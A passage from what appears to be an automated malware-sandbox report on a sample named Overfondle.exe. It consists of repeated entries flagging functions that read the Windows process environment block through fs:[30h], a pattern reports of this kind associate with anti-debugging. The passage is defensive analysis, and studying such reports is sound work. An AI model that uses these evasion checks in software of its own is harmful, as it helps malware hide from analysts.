Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204702E1 mov eax, dword ptr fs:[00000030h] 8_2_204702E1
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204702E1 mov eax, dword ptr fs:[00000030h] 8_2_204702E1
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E0283 mov eax, dword ptr fs:[00000030h] 8_2_204E0283
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E0283 mov eax, dword ptr fs:[00000030h] 8_2_204E0283
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E0283 mov eax, dword ptr fs:[00000030h] 8_2_204E0283
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049E284 mov eax, dword ptr fs:[00000030h] 8_2_2049E284
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049E284 mov eax, dword ptr fs:[00000030h] 8_2_2049E284
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204702A0 mov eax, dword ptr fs:[00000030h] 8_2_204702A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204702A0 mov eax, dword ptr fs:[00000030h] 8_2_204702A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F62A0 mov eax, dword ptr fs:[00000030h] 8_2_204F62A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F62A0 mov ecx, dword ptr fs:[00000030h] 8_2_204F62A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F62A0 mov eax, dword ptr fs:[00000030h] 8_2_204F62A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F62A0 mov eax, dword ptr fs:[00000030h] 8_2_204F62A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F62A0 mov eax, dword ptr fs:[00000030h] 8_2_204F62A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F62A0 mov eax, dword ptr fs:[00000030h] 8_2_204F62A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2052A352 mov eax, dword ptr fs:[00000030h] 8_2_2052A352
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20508350 mov ecx, dword ptr fs:[00000030h] 8_2_20508350
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E035C mov eax, dword ptr fs:[00000030h] 8_2_204E035C
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E035C mov eax, dword ptr fs:[00000030h] 8_2_204E035C
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E035C mov eax, dword ptr fs:[00000030h] 8_2_204E035C
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E035C mov ecx, dword ptr fs:[00000030h] 8_2_204E035C
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E035C mov eax, dword ptr fs:[00000030h] 8_2_204E035C
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E035C mov eax, dword ptr fs:[00000030h] 8_2_204E035C
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2053634F mov eax, dword ptr fs:[00000030h] 8_2_2053634F
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050437C mov eax, dword ptr fs:[00000030h] 8_2_2050437C
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049A30B mov eax, dword ptr fs:[00000030h] 8_2_2049A30B
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049A30B mov eax, dword ptr fs:[00000030h] 8_2_2049A30B
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049A30B mov eax, dword ptr fs:[00000030h] 8_2_2049A30B
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045C310 mov ecx, dword ptr fs:[00000030h] 8_2_2045C310
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20480310 mov ecx, dword ptr fs:[00000030h] 8_2_20480310
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_205043D4 mov eax, dword ptr fs:[00000030h] 8_2_205043D4
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_205043D4 mov eax, dword ptr fs:[00000030h] 8_2_205043D4
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204683C0 mov eax, dword ptr fs:[00000030h] 8_2_204683C0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204683C0 mov eax, dword ptr fs:[00000030h] 8_2_204683C0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204683C0 mov eax, dword ptr fs:[00000030h] 8_2_204683C0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204683C0 mov eax, dword ptr fs:[00000030h] 8_2_204683C0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046A3C0 mov eax, dword ptr fs:[00000030h] 8_2_2046A3C0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046A3C0 mov eax, dword ptr fs:[00000030h] 8_2_2046A3C0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046A3C0 mov eax, dword ptr fs:[00000030h] 8_2_2046A3C0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046A3C0 mov eax, dword ptr fs:[00000030h] 8_2_2046A3C0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046A3C0 mov eax, dword ptr fs:[00000030h] 8_2_2046A3C0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046A3C0 mov eax, dword ptr fs:[00000030h] 8_2_2046A3C0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050E3DB mov eax, dword ptr fs:[00000030h] 8_2_2050E3DB
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050E3DB mov eax, dword ptr fs:[00000030h] 8_2_2050E3DB
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050E3DB mov ecx, dword ptr fs:[00000030h] 8_2_2050E3DB
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050E3DB mov eax, dword ptr fs:[00000030h] 8_2_2050E3DB
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2051C3CD mov eax, dword ptr fs:[00000030h] 8_2_2051C3CD
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204703E9 mov eax, dword ptr fs:[00000030h] 8_2_204703E9
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204703E9 mov eax, dword ptr fs:[00000030h] 8_2_204703E9
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204703E9 mov eax, dword ptr fs:[00000030h] 8_2_204703E9
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204703E9 mov eax, dword ptr fs:[00000030h] 8_2_204703E9
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204703E9 mov eax, dword ptr fs:[00000030h] 8_2_204703E9
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204703E9 mov eax, dword ptr fs:[00000030h] 8_2_204703E9
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204703E9 mov eax, dword ptr fs:[00000030h] 8_2_204703E9
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204703E9 mov eax, dword ptr fs:[00000030h] 8_2_204703E9
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204963FF mov eax, dword ptr fs:[00000030h] 8_2_204963FF
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2047E3F0 mov eax, dword ptr fs:[00000030h] 8_2_2047E3F0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2047E3F0 mov eax, dword ptr fs:[00000030h] 8_2_2047E3F0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2047E3F0 mov eax, dword ptr fs:[00000030h] 8_2_2047E3F0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048438F mov eax, dword ptr fs:[00000030h] 8_2_2048438F
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048438F mov eax, dword ptr fs:[00000030h] 8_2_2048438F
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045E388 mov eax, dword ptr fs:[00000030h] 8_2_2045E388
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045E388 mov eax, dword ptr fs:[00000030h] 8_2_2045E388
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045E388 mov eax, dword ptr fs:[00000030h] 8_2_2045E388
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20458397 mov eax, dword ptr fs:[00000030h] 8_2_20458397
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20458397 mov eax, dword ptr fs:[00000030h] 8_2_20458397
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20458397 mov eax, dword ptr fs:[00000030h] 8_2_20458397
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2051A456 mov eax, dword ptr fs:[00000030h] 8_2_2051A456
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049E443 mov eax, dword ptr fs:[00000030h] 8_2_2049E443
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049E443 mov eax, dword ptr fs:[00000030h] 8_2_2049E443
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049E443 mov eax, dword ptr fs:[00000030h] 8_2_2049E443
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049E443 mov eax, dword ptr fs:[00000030h] 8_2_2049E443
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049E443 mov eax, dword ptr fs:[00000030h] 8_2_2049E443
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049E443 mov eax, dword ptr fs:[00000030h] 8_2_2049E443
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049E443 mov eax, dword ptr fs:[00000030h] 8_2_2049E443
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049E443 mov eax, dword ptr fs:[00000030h] 8_2_2049E443
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048245A mov eax, dword ptr fs:[00000030h] 8_2_2048245A
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204EC460 mov ecx, dword ptr fs:[00000030h] 8_2_204EC460
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048A470 mov eax, dword ptr fs:[00000030h] 8_2_2048A470
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048A470 mov eax, dword ptr fs:[00000030h] 8_2_2048A470
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048A470 mov eax, dword ptr fs:[00000030h] 8_2_2048A470
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20498402 mov eax, dword ptr fs:[00000030h] 8_2_20498402
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20498402 mov eax, dword ptr fs:[00000030h] 8_2_20498402
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20498402 mov eax, dword ptr fs:[00000030h] 8_2_20498402
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045C427 mov eax, dword ptr fs:[00000030h] 8_2_2045C427
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045E420 mov eax, dword ptr fs:[00000030h] 8_2_2045E420
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045E420 mov eax, dword ptr fs:[00000030h] 8_2_2045E420
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045E420 mov eax, dword ptr fs:[00000030h] 8_2_2045E420
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E6420 mov eax, dword ptr fs:[00000030h] 8_2_204E6420
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E6420 mov eax, dword ptr fs:[00000030h] 8_2_204E6420
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E6420 mov eax, dword ptr fs:[00000030h] 8_2_204E6420
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E6420 mov eax, dword ptr fs:[00000030h] 8_2_204E6420
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E6420 mov eax, dword ptr fs:[00000030h] 8_2_204E6420
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E6420 mov eax, dword ptr fs:[00000030h] 8_2_204E6420
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E6420 mov eax, dword ptr fs:[00000030h] 8_2_204E6420
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049A430 mov eax, dword ptr fs:[00000030h] 8_2_2049A430
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204604E5 mov ecx, dword ptr fs:[00000030h] 8_2_204604E5
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2051A49A mov eax, dword ptr fs:[00000030h] 8_2_2051A49A
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204664AB mov eax, dword ptr fs:[00000030h] 8_2_204664AB
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204944B0 mov ecx, dword ptr fs:[00000030h] 8_2_204944B0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204EA4B0 mov eax, dword ptr fs:[00000030h] 8_2_204EA4B0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20468550 mov eax, dword ptr fs:[00000030h] 8_2_20468550
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20468550 mov eax, dword ptr fs:[00000030h] 8_2_20468550
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049656A mov eax, dword ptr fs:[00000030h] 8_2_2049656A
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049656A mov eax, dword ptr fs:[00000030h] 8_2_2049656A
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049656A mov eax, dword ptr fs:[00000030h] 8_2_2049656A
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F6500 mov eax, dword ptr fs:[00000030h] 8_2_204F6500
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20534500 mov eax, dword ptr fs:[00000030h] 8_2_20534500
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20534500 mov eax, dword ptr fs:[00000030h] 8_2_20534500
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20534500 mov eax, dword ptr fs:[00000030h] 8_2_20534500
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20534500 mov eax, dword ptr fs:[00000030h] 8_2_20534500
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20534500 mov eax, dword ptr fs:[00000030h] 8_2_20534500
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20534500 mov eax, dword ptr fs:[00000030h] 8_2_20534500
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20534500 mov eax, dword ptr fs:[00000030h] 8_2_20534500
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20470535 mov eax, dword ptr fs:[00000030h] 8_2_20470535
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20470535 mov eax, dword ptr fs:[00000030h] 8_2_20470535
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20470535 mov eax, dword ptr fs:[00000030h] 8_2_20470535
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20470535 mov eax, dword ptr fs:[00000030h] 8_2_20470535
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20470535 mov eax, dword ptr fs:[00000030h] 8_2_20470535
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20470535 mov eax, dword ptr fs:[00000030h] 8_2_20470535
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048E53E mov eax, dword ptr fs:[00000030h] 8_2_2048E53E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048E53E mov eax, dword ptr fs:[00000030h] 8_2_2048E53E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048E53E mov eax, dword ptr fs:[00000030h] 8_2_2048E53E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048E53E mov eax, dword ptr fs:[00000030h] 8_2_2048E53E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048E53E mov eax, dword ptr fs:[00000030h] 8_2_2048E53E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049E5CF mov eax, dword ptr fs:[00000030h] 8_2_2049E5CF
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049E5CF mov eax, dword ptr fs:[00000030h] 8_2_2049E5CF
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204665D0 mov eax, dword ptr fs:[00000030h] 8_2_204665D0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049A5D0 mov eax, dword ptr fs:[00000030h] 8_2_2049A5D0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049A5D0 mov eax, dword ptr fs:[00000030h] 8_2_2049A5D0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049C5ED mov eax, dword ptr fs:[00000030h] 8_2_2049C5ED
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049C5ED mov eax, dword ptr fs:[00000030h] 8_2_2049C5ED
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204625E0 mov eax, dword ptr fs:[00000030h] 8_2_204625E0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048E5E7 mov eax, dword ptr fs:[00000030h] 8_2_2048E5E7
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048E5E7 mov eax, dword ptr fs:[00000030h] 8_2_2048E5E7
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048E5E7 mov eax, dword ptr fs:[00000030h] 8_2_2048E5E7
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048E5E7 mov eax, dword ptr fs:[00000030h] 8_2_2048E5E7
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048E5E7 mov eax, dword ptr fs:[00000030h] 8_2_2048E5E7
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048E5E7 mov eax, dword ptr fs:[00000030h] 8_2_2048E5E7
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048E5E7 mov eax, dword ptr fs:[00000030h] 8_2_2048E5E7
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048E5E7 mov eax, dword ptr fs:[00000030h] 8_2_2048E5E7
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20494588 mov eax, dword ptr fs:[00000030h] 8_2_20494588
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20462582 mov eax, dword ptr fs:[00000030h] 8_2_20462582
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20462582 mov ecx, dword ptr fs:[00000030h] 8_2_20462582
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049E59C mov eax, dword ptr fs:[00000030h] 8_2_2049E59C
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E05A7 mov eax, dword ptr fs:[00000030h] 8_2_204E05A7
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E05A7 mov eax, dword ptr fs:[00000030h] 8_2_204E05A7
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E05A7 mov eax, dword ptr fs:[00000030h] 8_2_204E05A7
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204845B1 mov eax, dword ptr fs:[00000030h] 8_2_204845B1
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204845B1 mov eax, dword ptr fs:[00000030h] 8_2_204845B1
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2047C640 mov eax, dword ptr fs:[00000030h] 8_2_2047C640
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049A660 mov eax, dword ptr fs:[00000030h] 8_2_2049A660
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049A660 mov eax, dword ptr fs:[00000030h] 8_2_2049A660
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2052866E mov eax, dword ptr fs:[00000030h] 8_2_2052866E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2052866E mov eax, dword ptr fs:[00000030h] 8_2_2052866E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20492674 mov eax, dword ptr fs:[00000030h] 8_2_20492674
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DE609 mov eax, dword ptr fs:[00000030h] 8_2_204DE609
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2047260B mov eax, dword ptr fs:[00000030h] 8_2_2047260B
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2047260B mov eax, dword ptr fs:[00000030h] 8_2_2047260B
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2047260B mov eax, dword ptr fs:[00000030h] 8_2_2047260B
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2047260B mov eax, dword ptr fs:[00000030h] 8_2_2047260B
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2047260B mov eax, dword ptr fs:[00000030h] 8_2_2047260B
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2047260B mov eax, dword ptr fs:[00000030h] 8_2_2047260B
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2047260B mov eax, dword ptr fs:[00000030h] 8_2_2047260B
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2619 mov eax, dword ptr fs:[00000030h] 8_2_204A2619
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2047E627 mov eax, dword ptr fs:[00000030h] 8_2_2047E627
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20496620 mov eax, dword ptr fs:[00000030h] 8_2_20496620
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20498620 mov eax, dword ptr fs:[00000030h] 8_2_20498620
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046262C mov eax, dword ptr fs:[00000030h] 8_2_2046262C
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049A6C7 mov ebx, dword ptr fs:[00000030h] 8_2_2049A6C7
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049A6C7 mov eax, dword ptr fs:[00000030h] 8_2_2049A6C7
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DE6F2 mov eax, dword ptr fs:[00000030h] 8_2_204DE6F2
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DE6F2 mov eax, dword ptr fs:[00000030h] 8_2_204DE6F2
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DE6F2 mov eax, dword ptr fs:[00000030h] 8_2_204DE6F2
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DE6F2 mov eax, dword ptr fs:[00000030h] 8_2_204DE6F2
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E06F1 mov eax, dword ptr fs:[00000030h] 8_2_204E06F1
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E06F1 mov eax, dword ptr fs:[00000030h] 8_2_204E06F1
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20464690 mov eax, dword ptr fs:[00000030h] 8_2_20464690
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20464690 mov eax, dword ptr fs:[00000030h] 8_2_20464690
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049C6A6 mov eax, dword ptr fs:[00000030h] 8_2_2049C6A6
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204966B0 mov eax, dword ptr fs:[00000030h] 8_2_204966B0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049674D mov esi, dword ptr fs:[00000030h] 8_2_2049674D
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049674D mov eax, dword ptr fs:[00000030h] 8_2_2049674D
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049674D mov eax, dword ptr fs:[00000030h] 8_2_2049674D
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204EE75D mov eax, dword ptr fs:[00000030h] 8_2_204EE75D
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20460750 mov eax, dword ptr fs:[00000030h] 8_2_20460750
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2750 mov eax, dword ptr fs:[00000030h] 8_2_204A2750
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2750 mov eax, dword ptr fs:[00000030h] 8_2_204A2750
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E4755 mov eax, dword ptr fs:[00000030h] 8_2_204E4755
